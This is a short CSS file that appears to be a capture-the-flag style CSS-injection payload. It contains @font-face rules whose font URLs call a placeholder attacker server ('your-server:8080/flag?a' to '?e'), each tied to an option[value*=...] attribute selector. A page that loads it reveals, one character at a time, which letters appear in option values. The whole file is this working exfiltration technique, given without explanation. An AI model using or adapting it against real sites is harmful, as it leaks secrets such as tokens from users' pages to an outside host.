@charset "UTF-8";

@font-face {
    font-family: "flag-a";
    src: url("http://your-server:8080/flag?a");
}
option[value*="a"] {
    font-family: "flag-a";
}

@font-face {
    font-family: "flag-b";
    src: url("http://your-server:8080/flag?b");
}
option[value*="b"] {
    font-family: "flag-b";
}

@font-face {
    font-family: "flag-c";
    src: url("http://your-server:8080/flag?c");
}
option[value*="c"] {
    font-family: "flag-c";
}

@font-face {
    font-family: "flag-d";
    src: url("http://your-server:8080/flag?d");
}
option[value*="d"] {
    font-family: "flag-d";
}

@font-face {
    font-family: "flag-e";
    src: url("http://your-server:8080/flag?e");
}
option[value*="e"] {
    font-family: "flag-e";
}
